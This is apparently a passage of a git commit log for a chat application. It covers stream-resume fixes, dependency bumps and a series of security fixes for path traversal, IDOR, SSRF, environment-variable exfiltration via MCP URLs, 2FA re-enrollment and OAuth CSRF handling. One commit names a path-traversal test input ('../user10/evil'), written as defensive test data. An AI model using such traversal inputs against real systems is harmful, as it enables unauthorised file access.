- Modified the `subscribe` method to utilize a new `skipBufferReplay` option, allowing for the prevention of duplicate events during resume connections.
- Enhanced the logic in the `chat/stream` route to conditionally skip replaying buffered events if a sync event has already been sent, improving event handling efficiency.
- Updated integration tests to verify the correct behavior of the new option, ensuring that no buffered events are replayed when `skipBufferReplay` is true, while maintaining normal replay behavior when false.

* test: Enhance GenerationJobManager integration tests for Redis mode

- Updated integration tests to conditionally run based on the USE_REDIS environment variable, allowing for better control over Redis-related tests.
- Refactored test descriptions to utilize a dynamic `describeRedis` function, improving clarity and organization of tests related to Redis functionality.
- Removed redundant checks for Redis availability within individual tests, streamlining the test logic and enhancing readability.

* fix: sync handler state for new messages on resume

The sync event's else branch (new response message) was missing
resetContentHandler() and syncStepMessage() calls, leaving stale
handler state that caused subsequent deltas to build on partial
content instead of the synced aggregatedContent.

* feat: atomic subscribeWithResume to close resume event gap

Replaces separate getResumeState() + subscribe() calls with a single
subscribeWithResume() that atomically drains earlyEventBuffer between
the resume snapshot and the subscribe. In in-memory mode, drained events
are returned as pendingEvents for the client to replay after sync.
In Redis mode, pendingEvents is empty since chunks are already persisted.

The route handler now uses the atomic method for resume connections and
extracted shared SSE write helpers to reduce duplication. The client
replays any pendingEvents through the existing step/content handlers
after applying aggregatedContent from the sync payload.

* fix: only capture gap events in subscribeWithResume, not pre-snapshot buffer

The previous implementation drained the entire earlyEventBuffer into
pendingEvents, but pre-snapshot events are already reflected in
aggregatedContent. Replaying them re-introduced the duplication bug
through a different vector.

Now records buffer length before getResumeState() and slices from that
index, so only events arriving during the async gap are returned as
pendingEvents.

Also:
- Handle pendingEvents when resumeState is null (replay directly)
- Hoist duplicate test helpers to shared scope
- Remove redundant writableEnded guard in onDone
2026-03-14 10:54:26 -04:00
Danny Avila
cbdc6f6060
📦 chore: Bump NPM Audit Packages (#12227)
Some checks failed
Docker Dev Branch Images Build / build (Dockerfile, lc-dev, node) (push) Waiting to run
Docker Dev Branch Images Build / build (Dockerfile.multi, lc-dev-api, api-build) (push) Waiting to run
Docker Dev Images Build / build (Dockerfile, librechat-dev, node) (push) Has been cancelled
Docker Dev Images Build / build (Dockerfile.multi, librechat-dev-api, api-build) (push) Has been cancelled
Sync Locize Translations & Create Translation PR / Sync Translation Keys with Locize (push) Has been cancelled
Sync Locize Translations & Create Translation PR / Create Translation PR on Version Published (push) Has been cancelled
* 🔧 chore: Update file-type dependency to version 21.3.2 in package-lock.json and package.json

- Upgraded the "file-type" package from version 18.7.0 to 21.3.2 to ensure compatibility with the latest features and security updates.
- Added new dependencies related to the updated "file-type" package, enhancing functionality and performance.

* 🔧 chore: Upgrade undici dependency to version 7.24.1 in package-lock.json and package.json

- Updated the "undici" package from version 7.18.2 to 7.24.1 across multiple package files to ensure compatibility with the latest features and security updates.

* 🔧 chore: Upgrade yauzl dependency to version 3.2.1 in package-lock.json

- Updated the "yauzl" package from version 3.2.0 to 3.2.1 to incorporate the latest features and security updates.

* 🔧 chore: Upgrade hono dependency to version 4.12.7 in package-lock.json

- Updated the "hono" package from version 4.12.5 to 4.12.7 to incorporate the latest features and security updates.
2026-03-14 03:36:03 -04:00
Danny Avila
f67bbb2bc5
🧹 fix: Sanitize Artifact Filenames in Code Execution Output (#12222)
* fix: sanitize artifact filenames to prevent path traversal in code output

* test: Mock sanitizeFilename function in process.spec.js to return the original filename

- Added a mock implementation for the `sanitizeFilename` function in the `process.spec.js` test file to return the original filename, ensuring that tests can run without altering the filename during the testing process.

* fix: use path.relative for traversal check, sanitize all filenames, add security logging

- Replace startsWith with path.relative pattern in saveLocalBuffer, consistent
  with deleteLocalFile and getLocalFileStream in the same file
- Hoist sanitizeFilename call before the image/non-image branch so both code
  paths store the sanitized name in MongoDB
- Log a warning when sanitizeFilename mutates a filename (potential traversal)
- Log a specific warning when saveLocalBuffer throws a traversal error, so
  security events are distinguishable from generic network errors in the catch

* test: improve traversal test coverage and remove mock reimplementation

- Remove partial sanitizeFilename reimplementation from process-traversal tests;
  use controlled mock returns to verify processCodeOutput wiring instead
- Add test for image branch sanitization
- Use mkdtempSync for test isolation in crud-traversal to avoid parallel worker
  collisions
- Add prefix-collision bypass test case (../user10/evil vs user1 directory)

* fix: use path.relative in isValidPath to prevent prefix-collision bypass

Pre-existing startsWith check without path separator had the same class
of prefix-collision vulnerability fixed in saveLocalBuffer.
2026-03-14 03:09:26 -04:00
Danny Avila
35a35dc2e9
📏 refactor: Add File Size Limits to Conversation Imports (#12221)
* fix: add file size limits to conversation import multer instance

* fix: address review findings for conversation import file size limits

* fix: use local jest.mock for data-schemas instead of global moduleNameMapper

The global @librechat/data-schemas mock in jest.config.js only provided
logger, breaking all tests that depend on createModels from the same
package. Replace with a virtual jest.mock scoped to the import spec file.

* fix: move import to top of file, pre-compute upload middleware, assert logger.warn in tests

* refactor: move resolveImportMaxFileSize to packages/api

New backend logic belongs in packages/api as TypeScript. Delete the
api/server/utils/import/limits.js wrapper and import directly from
@librechat/api in convos.js and importConversations.js. Resolver unit
tests move to packages/api; the api/ spec retains only multer behavior
tests.

* chore: rename importLimits to import

* fix: stale type reference and mock isolation in import tests

Update typeof import path from '../importLimits' to '../import' after
the rename. Clear mockLogger.warn in beforeEach to prevent cross-test
accumulation.

* fix: add resolveImportMaxFileSize to @librechat/api mock in convos.spec.js

* fix: resolve jest.mock hoisting issue in import tests

jest.mock factories are hoisted above const declarations, so the
mockLogger reference was undefined at factory evaluation time. Use a
direct import of the mocked logger module instead.

* fix: remove virtual flag from data-schemas mock for CI compatibility

virtual: true prevents the mock from intercepting the real module in
CI where @librechat/data-schemas is built, causing import.ts to use
the real logger while the test asserts against the mock.
2026-03-14 03:06:29 -04:00
Danny Avila
c6982dc180
🛡️ fix: Agent Permission Check on Image Upload Route (#12219)
* fix: add agent permission check to image upload route

* refactor: remove unused SystemRoles import and format test file for clarity

* fix: address review findings for image upload agent permission check

* refactor: move agent upload auth logic to TypeScript in packages/api

Extract pure authorization logic from agentPermCheck.js into
checkAgentUploadAuth() in packages/api/src/files/agentUploadAuth.ts.
The function returns a structured result ({ allowed, status, error })
instead of writing HTTP responses directly, eliminating the dual
responsibility and confusing sentinel return value. The JS wrapper
in /api is now a thin adapter that translates the result to HTTP.

* test: rewrite image upload permission tests as integration tests

Replace mock-heavy images-agent-perm.spec.js with integration tests
using MongoMemoryServer, real models, and real PermissionService.
Follows the established pattern in files.agents.test.js. Moves test
to sibling location (images.agents.test.js) matching backend convention.
Adds temp file cleanup assertions on 403/404 responses and covers
message_file exemption paths (boolean true, string "true", false).

* fix: widen AgentUploadAuthDeps types to accept ObjectId from Mongoose

The injected getAgent returns Mongoose documents where _id and author
are Types.ObjectId at runtime, not string. Widen the DI interface to
accept string | Types.ObjectId for _id, author, and resourceId so the
contract accurately reflects real callers.

* chore: move agent upload auth into files/agents/ subdirectory

* refactor: delete agentPermCheck.js wrapper, move verifyAgentUploadPermission to packages/api

The /api-only dependencies (getAgent, checkPermission) are now passed
as object-field params from the route call sites. Both images.js and
files.js import verifyAgentUploadPermission from @librechat/api and
inject the deps directly, eliminating the intermediate JS wrapper.

* style: fix import type ordering in agent upload auth

* fix: prevent token TTL race in MCPTokenStorage.storeTokens

When expires_in is provided, use it directly instead of round-tripping
through Date arithmetic. The previous code computed accessTokenExpiry
as a Date, then after an async encryptV2 call, recomputed expiresIn by
subtracting Date.now(). On loaded CI runners the elapsed time caused
Math.floor to truncate to 0, triggering the 1-year fallback and making
the token appear permanently valid — so refresh never fired.
2026-03-14 02:57:56 -04:00
Danny Avila
71a3b48504
🔑 fix: Require OTP Verification for 2FA Re-Enrollment and Backup Code Regeneration (#12223)
* fix: require OTP verification for 2FA re-enrollment and backup code regeneration

* fix: require OTP verification for account deletion when 2FA is enabled

* refactor: Improve code formatting and readability in TwoFactorController and UserController

- Reformatted code in TwoFactorController and UserController for better readability by aligning parameters and breaking long lines.
- Updated test cases in deleteUser.spec.js and TwoFactorController.spec.js to enhance clarity by formatting object parameters consistently.

* refactor: Consolidate OTP and backup code verification logic in TwoFactorController and UserController

- Introduced a new `verifyOTPOrBackupCode` function to streamline the verification process for TOTP tokens and backup codes across multiple controllers.
- Updated the `enable2FA`, `disable2FA`, and `deleteUserController` methods to utilize the new verification function, enhancing code reusability and readability.
- Adjusted related tests to reflect the changes in verification logic, ensuring consistent behavior across different scenarios.
- Improved error handling and response messages for verification failures, providing clearer feedback to users.

* chore: linting

* refactor: Update BackupCodesItem component to enhance OTP verification logic

- Consolidated OTP input handling by moving the 2FA verification UI logic to a more consistent location within the component.
- Improved the state management for OTP readiness, ensuring the regenerate button is only enabled when the OTP is ready.
- Cleaned up imports by removing redundant type imports, enhancing code clarity and maintainability.

* chore: lint

* fix: stage 2FA re-enrollment in pending fields to prevent disarmament window

enable2FA now writes to pendingTotpSecret/pendingBackupCodes instead of
overwriting the live fields. confirm2FA performs the atomic swap only after
the new TOTP code is verified. If the user abandons mid-flow, their
existing 2FA remains active and intact.
2026-03-14 01:51:31 -04:00
Danny Avila
189cdf581d
🔐 fix: Add User Filter to Message Deletion (#12220)
* fix: add user filter to message deletion to prevent IDOR

* refactor: streamline DELETE request syntax in messages-delete test

- Simplified the DELETE request syntax in the messages-delete.spec.js test file by combining multiple lines into a single line for improved readability. This change enhances the clarity of the test code without altering its functionality.

* fix: address review findings for message deletion IDOR fix

* fix: add user filter to message deletion in conversation tests

- Included a user filter in the message deletion test to ensure proper handling of user-specific deletions, enhancing the accuracy of the test case and preventing potential IDOR vulnerabilities.

* chore: lint
2026-03-13 23:42:37 -04:00
Danny Avila
ca79a03135
🚦 fix: Add Rate Limiting to Conversation Duplicate Endpoint (#12218)
* fix: add rate limiting to conversation duplicate endpoint

* chore: linter

* fix: address review findings for conversation duplicate rate limiting

* refactor: streamline test mocks for conversation routes

- Consolidated mock implementations into a dedicated `convos-route-mocks.js` file to enhance maintainability and readability of test files.
- Updated tests in `convos-duplicate-ratelimit.spec.js` and `convos.spec.js` to utilize the new mock structure, improving clarity and reducing redundancy.
- Enhanced the `duplicateConversation` function to accept an optional title parameter for better flexibility in conversation duplication.

* chore: rename files
2026-03-13 23:40:44 -04:00
Danny Avila
fa9e1b228a
🪪 fix: MCP API Responses and OAuth Validation (#12217)
* 🔒 fix: Validate MCP Configs in Server Responses

* 🔒 fix: Enhance OAuth URL Validation in MCPOAuthHandler

- Introduced validation for OAuth URLs to ensure they do not target private or internal addresses, enhancing security against SSRF attacks.
- Updated the OAuth flow to validate both authorization and token URLs before use, ensuring compliance with security standards.
- Refactored redirect URI handling to streamline the OAuth client registration process.
- Added comprehensive error handling for invalid URLs, improving robustness in OAuth interactions.

* 🔒 feat: Implement Permission Checks for MCP Server Management

- Added permission checkers for MCP server usage and creation, enhancing access control.
- Updated routes for reinitializing MCP servers and retrieving authentication values to include these permission checks, ensuring only authorized users can access these functionalities.
- Refactored existing permission logic to improve clarity and maintainability.

* 🔒 fix: Enhance MCP Server Response Validation and Redaction

- Updated MCP route tests to use `toMatchObject` for better validation of server response structures, ensuring consistency in expected properties.
- Refactored the `redactServerSecrets` function to streamline the removal of sensitive information, ensuring that user-sourced API keys are properly redacted while retaining their source.
- Improved OAuth security tests to validate rejection of private URLs across multiple endpoints, enhancing protection against SSRF vulnerabilities.
- Added comprehensive tests for the `redactServerSecrets` function to ensure proper handling of various server configurations, reinforcing security measures.

* chore: eslint

* 🔒 fix: Enhance OAuth Server URL Validation in MCPOAuthHandler

- Added validation for discovered authorization server URLs to ensure they meet security standards.
- Improved logging to provide clearer insights when an authorization server is found from resource metadata.
- Refactored the handling of authorization server URLs to enhance robustness against potential security vulnerabilities.

* 🔒 test: Bypass SSRF validation for MCP OAuth Flow tests

- Mocked SSRF validation functions to allow tests to use real local HTTP servers, facilitating more accurate testing of the MCP OAuth flow.
- Updated test setup to ensure compatibility with the new mocking strategy, enhancing the reliability of the tests.

* 🔒 fix: Add Validation for OAuth Metadata Endpoints in MCPOAuthHandler

- Implemented checks for the presence and validity of registration and token endpoints in the OAuth metadata, enhancing security by ensuring that these URLs are properly validated before use.
- Improved error handling and logging to provide better insights during the OAuth metadata processing, reinforcing the robustness of the OAuth flow.

* 🔒 refactor: Simplify MCP Auth Values Endpoint Logic

- Removed redundant permission checks for accessing the MCP server resource in the auth-values endpoint, streamlining the request handling process.
- Consolidated error handling and response structure for improved clarity and maintainability.
- Enhanced logging for better insights during the authentication value checks, reinforcing the robustness of the endpoint.

* 🔒 test: Refactor LeaderElection Integration Tests for Improved Cleanup

- Moved Redis key cleanup to the beforeEach hook to ensure a clean state before each test.
- Enhanced afterEach logic to handle instance resignations and Redis key deletion more robustly, improving test reliability and maintainability.
2026-03-13 23:18:56 -04:00
Danny Avila
f32907cd36
🔏 fix: MCP Server URL Schema Validation (#12204)
Some checks are pending
Docker Dev Branch Images Build / build (Dockerfile, lc-dev, node) (push) Waiting to run
Docker Dev Branch Images Build / build (Dockerfile.multi, lc-dev-api, api-build) (push) Waiting to run
* fix: MCP server configuration validation and schema

- Added tests to reject URLs containing environment variable references for SSE, streamable-http, and websocket types in the MCP routes.
- Introduced a new schema in the data provider to ensure user input URLs do not resolve environment variables, enhancing security against potential leaks.
- Updated existing MCP server user input schema to utilize the new validation logic, ensuring consistent handling of user-supplied URLs across the application.

* fix: MCP URL validation to reject env variable references

- Updated tests to ensure that URLs for SSE, streamable-http, and websocket types containing environment variable patterns are rejected, improving security against potential leaks.
- Refactored the MCP server user input schema to enforce stricter validation rules, preventing the resolution of environment variables in user-supplied URLs.
- Introduced new test cases for various URL types to validate the rejection logic, ensuring consistent handling across the application.

* test: Enhance MCPServerUserInputSchema tests for environment variable handling

- Introduced new test cases to validate the prevention of environment variable exfiltration through user input URLs in the MCPServerUserInputSchema.
- Updated existing tests to confirm that URLs containing environment variable patterns are correctly resolved or rejected, improving security against potential leaks.
- Refactored test structure to better organize environment variable handling scenarios, ensuring comprehensive coverage of edge cases.
2026-03-12 23:19:31 -04:00
github-actions[bot]
65b0bfde1b
🌍 i18n: Update translation.json with latest translations (#12203)
Some checks are pending
Docker Dev Branch Images Build / build (Dockerfile, lc-dev, node) (push) Waiting to run
Docker Dev Branch Images Build / build (Dockerfile.multi, lc-dev-api, api-build) (push) Waiting to run
Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@users.noreply.github.com>
2026-03-12 20:48:05 -04:00
Danny Avila
3ddf62c8e5
🫙 fix: Force MeiliSearch Full Sync on Empty Index State (#12202)
Some checks failed
Docker Dev Images Build / build (Dockerfile, librechat-dev, node) (push) Has been cancelled
Docker Dev Images Build / build (Dockerfile.multi, librechat-dev-api, api-build) (push) Has been cancelled
Sync Locize Translations & Create Translation PR / Sync Translation Keys with Locize (push) Has been cancelled
Sync Locize Translations & Create Translation PR / Create Translation PR on Version Published (push) Has been cancelled
* fix: meili index sync with unindexed documents

- Updated `performSync` function to force a full sync when a fresh MeiliSearch index is detected, even if the number of unindexed messages or convos is below the sync threshold.
- Added logging to indicate when a fresh index is detected and a full sync is initiated.
- Introduced new tests to validate the behavior of the sync logic under various conditions, ensuring proper handling of fresh indexes and threshold scenarios.

This change improves the reliability of the synchronization process, ensuring that all documents are indexed correctly when starting with a fresh index.

* refactor: update sync logic for unindexed documents in MeiliSearch

- Renamed variables in `performSync` to improve clarity, changing `freshIndex` to `noneIndexed` for better understanding of the sync condition.
- Adjusted the logic to ensure a full sync is forced when no messages or conversations are marked as indexed, even if below the sync threshold.
- Updated related tests to reflect the new logging messages and conditions, enhancing the accuracy of the sync threshold logic.

This change improves the readability and reliability of the synchronization process, ensuring all documents are indexed correctly when starting with a fresh index.

* fix: enhance MeiliSearch index creation error handling

- Updated the `mongoMeili` function to improve logging and error handling during index creation in MeiliSearch.
- Added handling for `MeiliSearchTimeOutError` to log a warning when index creation times out.
- Enhanced logging to differentiate between successful index creation and specific failure reasons, including cases where the index already exists.
- Improved debug logging for index creation tasks to provide clearer insights into the process.

This change enhances the robustness of the index creation process and improves observability for troubleshooting.

* fix: update MeiliSearch index creation error handling

- Modified the `mongoMeili` function to check for any status other than 'succeeded' during index creation, enhancing error detection.
- Improved logging to provide clearer insights when an index creation task fails, particularly for cases where the index already exists.

This change strengthens the error handling mechanism for index creation in MeiliSearch, ensuring better observability and reliability.
2026-03-12 20:43:23 -04:00
github-actions[bot]
fc6f7a337d
🌍 i18n: Update translation.json with latest translations (#12176)
Some checks failed
Docker Dev Branch Images Build / build (Dockerfile, lc-dev, node) (push) Has been cancelled
Docker Dev Branch Images Build / build (Dockerfile.multi, lc-dev-api, api-build) (push) Has been cancelled
Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@users.noreply.github.com>
2026-03-11 11:46:55 -04:00
Danny Avila
9a5d7eaa4e
refactor: Replace tiktoken with ai-tokenizer (#12175)
Some checks failed
Docker Dev Branch Images Build / build (Dockerfile, lc-dev, node) (push) Waiting to run
Docker Dev Branch Images Build / build (Dockerfile.multi, lc-dev-api, api-build) (push) Waiting to run
Docker Dev Images Build / build (Dockerfile, librechat-dev, node) (push) Has been cancelled
Docker Dev Images Build / build (Dockerfile.multi, librechat-dev-api, api-build) (push) Has been cancelled
Sync Locize Translations & Create Translation PR / Sync Translation Keys with Locize (push) Has been cancelled
Sync Locize Translations & Create Translation PR / Create Translation PR on Version Published (push) Has been cancelled
* chore: Update dependencies by adding ai-tokenizer and removing tiktoken

- Added ai-tokenizer version 1.0.6 to package.json and package-lock.json across multiple packages.
- Removed tiktoken version 1.0.15 from package.json and package-lock.json in the same locations, streamlining dependency management.

* refactor: replace js-tiktoken with ai-tokenizer

- Added support for 'claude' encoding in the AgentClient class to improve model compatibility.
- Updated Tokenizer class to utilize 'ai-tokenizer' for both 'o200k_base' and 'claude' encodings, replacing the previous 'tiktoken' dependency.
- Refactored tests to reflect changes in tokenizer behavior and ensure accurate token counting for both encoding types.
- Removed deprecated references to 'tiktoken' and adjusted related tests for improved clarity and functionality.

* chore: remove tiktoken mocks from DALLE3 tests

- Eliminated mock implementations of 'tiktoken' from DALLE3-related test files to streamline test setup and align with recent dependency updates.
- Adjusted related test structures to ensure compatibility with the new tokenizer implementation.

* chore: Add distinct encoding support for Anthropic Claude models

- Introduced a new method `getEncoding` in the AgentClient class to handle the specific BPE tokenizer for Claude models, ensuring compatibility with the distinct encoding requirements.
- Updated documentation to clarify the encoding logic for Claude and other models.

* docs: Update return type documentation for getEncoding method in AgentClient

- Clarified the return type of the getEncoding method to specify that it can return an EncodingName or undefined, enhancing code readability and type safety.

* refactor: Tokenizer class and error handling

- Exported the EncodingName type for broader usage.
- Renamed encodingMap to encodingData for clarity.
- Improved error handling in getTokenCount method to ensure recovery attempts are logged and return 0 on failure.
- Updated countTokens function documentation to specify the use of 'o200k_base' encoding.

* refactor: Simplify encoding documentation and export type

- Updated the getEncoding method documentation to clarify the default behavior for non-Anthropic Claude models.
- Exported the EncodingName type separately from the Tokenizer module for improved clarity and usage.

* test: Update text processing tests for token limits

- Adjusted test cases to handle smaller text sizes, changing scenarios from ~120k tokens to ~20k tokens for both the real tokenizer and countTokens functions.
- Updated token limits in tests to reflect new constraints, ensuring tests accurately assess performance and call reduction.
- Enhanced console log messages for clarity regarding token counts and reductions in the updated scenarios.

* refactor: Update Tokenizer imports and exports

- Moved Tokenizer and countTokens exports to the tokenizer module for better organization.
- Adjusted imports in memory.ts to reflect the new structure, ensuring consistent usage across the codebase.
- Updated memory.test.ts to mock the Tokenizer from the correct module path, enhancing test accuracy.

* refactor: Tokenizer initialization and error handling

- Introduced an async `initEncoding` method to preload tokenizers, improving performance and accuracy in token counting.
- Updated `getTokenCount` to handle uninitialized tokenizers more gracefully, ensuring proper recovery and logging on errors.
- Removed deprecated synchronous tokenizer retrieval, streamlining the overall tokenizer management process.

* test: Enhance tokenizer tests with initialization and encoding checks

- Added `beforeAll` hooks to initialize tokenizers for 'o200k_base' and 'claude' encodings before running tests, ensuring proper setup.
- Updated tests to validate the loading of encodings and the correctness of token counts for both 'o200k_base' and 'claude'.
- Improved test structure to deduplicate concurrent initialization calls, enhancing performance and reliability.
2026-03-10 23:14:52 -04:00
Danny Avila
fcb344da47
🛂 fix: MCP OAuth Race Conditions, CSRF Fallback, and Token Expiry Handling (#12171)
Some checks are pending
Docker Dev Branch Images Build / build (Dockerfile, lc-dev, node) (push) Waiting to run
Docker Dev Branch Images Build / build (Dockerfile.multi, lc-dev-api, api-build) (push) Waiting to run
* fix: Implement race conditions in MCP OAuth flow

- Added connection mutex to coalesce concurrent `getUserConnection` calls, preventing multiple simultaneous attempts.
- Enhanced flow state management to retry once when a flow state is missing, improving resilience against race conditions.
- Introduced `ReauthenticationRequiredError` for better error handling when access tokens are expired or missing.
- Updated tests to cover new race condition scenarios and ensure proper handling of OAuth flows.

* fix: Stale PENDING flow detection and OAuth URL re-issuance

PENDING flows in handleOAuthRequired now check createdAt age — flows
older than 2 minutes are treated as stale and replaced instead of
joined. Fixes the case where a leftover PENDING flow from a previous
session blocks new OAuth initiation.

authorizationUrl is now stored in MCPOAuthFlowMetadata so that when a
second caller joins an active PENDING flow (e.g., the SSE-emitting path
in ToolService), it can re-issue the URL to the user via oauthStart.

* fix: CSRF fallback via active PENDING flow in OAuth callback

When the OAuth callback arrives without CSRF or session cookies (common
in the chat/SSE flow where cookies can't be set on streaming responses),
fall back to validating that a PENDING flow exists for the flowId. This
is safe because the flow was created server-side after JWT authentication
and the authorization code is PKCE-protected.

* test: Extract shared OAuth test server helpers

Move MockKeyv, getFreePort, trackSockets, and createOAuthMCPServer into
a shared helpers/oauthTestServer module. Enhance the test server with
refresh token support, token rotation, metadata discovery, and dynamic
client registration endpoints. Add InMemoryTokenStore for token storage
tests.

Refactor MCPOAuthRaceCondition.test.ts to import from shared helpers.

* test: Add comprehensive MCP OAuth test modules

MCPOAuthTokenStorage — 21 tests for storeTokens/getTokens with
InMemoryTokenStore: encrypt/decrypt round-trips, expiry calculation,
refresh callback wiring, ReauthenticationRequiredError paths.

MCPOAuthFlow — 10 tests against real HTTP server: token refresh with
stored client info, refresh token rotation, metadata discovery, dynamic
client registration, full store/retrieve/expire/refresh lifecycle.

MCPOAuthConnectionEvents — 5 tests for MCPConnection OAuth event cycle
with real OAuth-gated MCP server: oauthRequired emission on 401,
oauthHandled reconnection, oauthFailed rejection, token expiry detection.

MCPOAuthTokenExpiry — 12 tests for the token expiry edge case: refresh
success/failure paths, ReauthenticationRequiredError, PENDING flow CSRF
fallback, authorizationUrl metadata storage, full re-auth cycle after
refresh failure, concurrent expired token coalescing, stale PENDING
flow detection.

* test: Enhance MCP OAuth connection tests with cooldown reset

Added a `beforeEach` hook to clear the cooldown for `MCPConnection` before each test, ensuring a clean state. Updated the race condition handling in the tests to properly clear the timeout, improving reliability in the event data retrieval process.

* refactor: PENDING flow management and state recovery in MCP OAuth

- Introduced a constant `PENDING_STALE_MS` to define the age threshold for PENDING flows, improving the handling of stale flows.
- Updated the logic in `MCPConnectionFactory` and `FlowStateManager` to check the age of PENDING flows before joining or reusing them.
- Modified the `completeFlow` method to return false when the flow state is deleted, ensuring graceful handling of race conditions.
- Enhanced tests to validate the new behavior and ensure robustness against state recovery issues.

* refactor: MCP OAuth flow management and testing

- Updated the `completeFlow` method to log warnings when a tool flow state is not found during completion, improving error handling.
- Introduced a new `normalizeExpiresAt` function to standardize expiration timestamp handling across the application.
- Refactored token expiration checks in `MCPConnectionFactory` to utilize the new normalization function, ensuring consistent behavior.
- Added a comprehensive test suite for OAuth callback CSRF fallback logic, validating the handling of PENDING flows and their staleness.
- Enhanced existing tests to cover new expiration normalization logic and ensure robust flow state management.

* test: Add CSRF fallback tests for active PENDING flows in MCP OAuth

- Introduced new tests to validate CSRF fallback behavior when a fresh PENDING flow exists without cookies, ensuring successful OAuth callback handling.
- Added scenarios to reject requests when no PENDING flow exists, when only a COMPLETED flow is present, and when a PENDING flow is stale, enhancing the robustness of flow state management.
- Improved overall test coverage for OAuth callback logic, reinforcing the handling of CSRF validation failures.

* chore: imports order

* refactor: Update UserConnectionManager to conditionally manage pending connections

- Modified the logic in `UserConnectionManager` to only set pending connections if `forceNew` is false, preventing unnecessary overwrites.
- Adjusted the cleanup process to ensure pending connections are only deleted when not forced, enhancing connection management efficiency.

* refactor: MCP OAuth flow state management

- Introduced a new method `storeStateMapping` in `MCPOAuthHandler` to securely map the OAuth state parameter to the flow ID, improving callback resolution and security against forgery.
- Updated the OAuth initiation and callback handling in `mcp.js` to utilize the new state mapping functionality, ensuring robust flow management.
- Refactored `MCPConnectionFactory` to store state mappings during flow initialization, enhancing the integrity of the OAuth process.
- Adjusted comments to clarify the purpose of state parameters in authorization URLs, reinforcing code readability.

* refactor: MCPConnection with OAuth recovery handling

- Added `oauthRecovery` flag to manage OAuth recovery state during connection attempts.
- Introduced `decrementCycleCount` method to reduce the circuit breaker's cycle count upon successful reconnection after OAuth recovery.
- Updated connection logic to reset the `oauthRecovery` flag after handling OAuth, improving state management and connection reliability.

* chore: Add debug logging for OAuth recovery cycle count decrement

- Introduced a debug log statement in the `MCPConnection` class to track the decrement of the cycle count after a successful reconnection during OAuth recovery.
- This enhancement improves observability and aids in troubleshooting connection issues related to OAuth recovery.

* test: Add OAuth recovery cycle management tests

- Introduced new tests for the OAuth recovery cycle in `MCPConnection`, validating the decrement of cycle counts after successful reconnections.
- Added scenarios to ensure that the cycle count is not decremented on OAuth failures, enhancing the robustness of connection management.
- Improved test coverage for OAuth reconnect scenarios, ensuring reliable behavior under various conditions.

* feat: Implement circuit breaker configuration in MCP

- Added circuit breaker settings to `.env.example` for max cycles, cycle window, and cooldown duration.
- Refactored `MCPConnection` to utilize the new configuration values from `mcpConfig`, enhancing circuit breaker management.
- Improved code maintainability by centralizing circuit breaker parameters in the configuration file.

* refactor: Update decrementCycleCount method for circuit breaker management

- Changed the visibility of the `decrementCycleCount` method in `MCPConnection` from private to public static, allowing it to be called with a server name parameter.
- Updated calls to `decrementCycleCount` in `MCPConnectionFactory` to use the new static method, improving clarity and consistency in circuit breaker management during connection failures and OAuth recovery.
- Enhanced the handling of circuit breaker state by ensuring the method checks for the existence of the circuit breaker before decrementing the cycle count.

* refactor: cycle count decrement on tool listing failure

- Added a call to `MCPConnection.decrementCycleCount` in the `MCPConnectionFactory` to handle cases where unauthenticated tool listing fails, improving circuit breaker management.
- This change ensures that the cycle count is decremented appropriately, maintaining the integrity of the connection recovery process.

* refactor: Update circuit breaker configuration and logic

- Enhanced circuit breaker settings in `.env.example` to include new parameters for failed rounds and backoff strategies.
- Refactored `MCPConnection` to utilize the updated configuration values from `mcpConfig`, improving circuit breaker management.
- Updated tests to reflect changes in circuit breaker logic, ensuring accurate validation of connection behavior under rapid reconnect scenarios.

* feat: Implement state mapping deletion in MCP flow management

- Added a new method `deleteStateMapping` in `MCPOAuthHandler` to remove orphaned state mappings when a flow is replaced, preventing old authorization URLs from resolving after a flow restart.
- Updated `MCPConnectionFactory` to call `deleteStateMapping` during flow cleanup, ensuring proper management of OAuth states.
- Enhanced test coverage for state mapping functionality to validate the new deletion logic.
2026-03-10 21:15:01 -04:00
Danny Avila
6167ce6e57
🧪 chore: MCP Reconnect Storm Follow-Up Fixes and Integration Tests (#12172)
* 🧪 test: Add reconnection storm regression tests for MCPConnection

Introduced a comprehensive test suite for reconnection storm scenarios, validating circuit breaker, throttling, cooldown, and timeout fixes. The tests utilize real MCP SDK transports and a StreamableHTTP server to ensure accurate behavior under rapid connect/disconnect cycles and error handling for SSE 400/405 responses. This enhances the reliability of the MCPConnection by ensuring proper handling of reconnection logic and circuit breaker functionality.

* 🔧 fix: Update createUnavailableToolStub to return structured response

Modified the `createUnavailableToolStub` function to return an array containing the unavailable message and a null value, enhancing the response structure. Additionally, added a debug log to skip tool creation when the result is null, improving the handling of reconnection scenarios in the MCP service.

* 🧪 test: Enhance MCP tool creation tests for cache and throttle interactions

Added new test cases for the `createMCPTool` function to validate the caching behavior when tools are unavailable or throttled. The tests ensure that tools are correctly cached as missing and prevent unnecessary reconnects across different users, improving the reliability of the MCP service under concurrent usage scenarios. Additionally, introduced a test for the `createMCPTools` function to verify that it returns an empty array when reconnect is throttled, ensuring proper handling of throttling logic.

* 📝 docs: Update AGENTS.md with testing philosophy and guidelines

Expanded the testing section in AGENTS.md to emphasize the importance of using real logic over mocks, advocating for the use of spies and real dependencies in tests. Added specific recommendations for testing with MongoDB and MCP SDK, highlighting the need to mock only uncontrollable external services. This update aims to improve testing practices and encourage more robust test implementations.

* 🧪 test: Enhance reconnection storm tests with socket tracking and SSE handling

Updated the reconnection storm test suite to include a new socket tracking mechanism for better resource management during tests. Improved the handling of SSE 400/405 responses by ensuring they are processed in the same branch as 404 errors, preventing unhandled cases. This enhances the reliability of the MCPConnection under rapid reconnect scenarios and ensures proper error handling.

* 🔧 fix: Implement cache eviction for stale reconnect attempts and missing tools

Added an `evictStale` function to manage the size of the `lastReconnectAttempts` and `missingToolCache` maps, ensuring they do not exceed a maximum cache size. This enhancement improves resource management by removing outdated entries based on a specified time-to-live (TTL), thereby optimizing the MCP service's performance during reconnection scenarios.
2026-03-10 17:44:13 -04:00
Danny Avila
c0e876a2e6
🔄 refactor: OAuth Metadata Discovery with Origin Fallback (#12170)
* 🔄 refactor: OAuth Metadata Discovery with Origin Fallback

Updated the `discoverWithOriginFallback` method to improve the handling of OAuth authorization server metadata discovery. The method now retries with the origin URL when discovery fails for a path-based URL, ensuring consistent behavior across `discoverMetadata` and token refresh flows. This change reduces code duplication and enhances the reliability of the OAuth flow by providing a unified implementation for origin fallback logic.

* 🧪 test: Add tests for OAuth Token Refresh with Origin Fallback

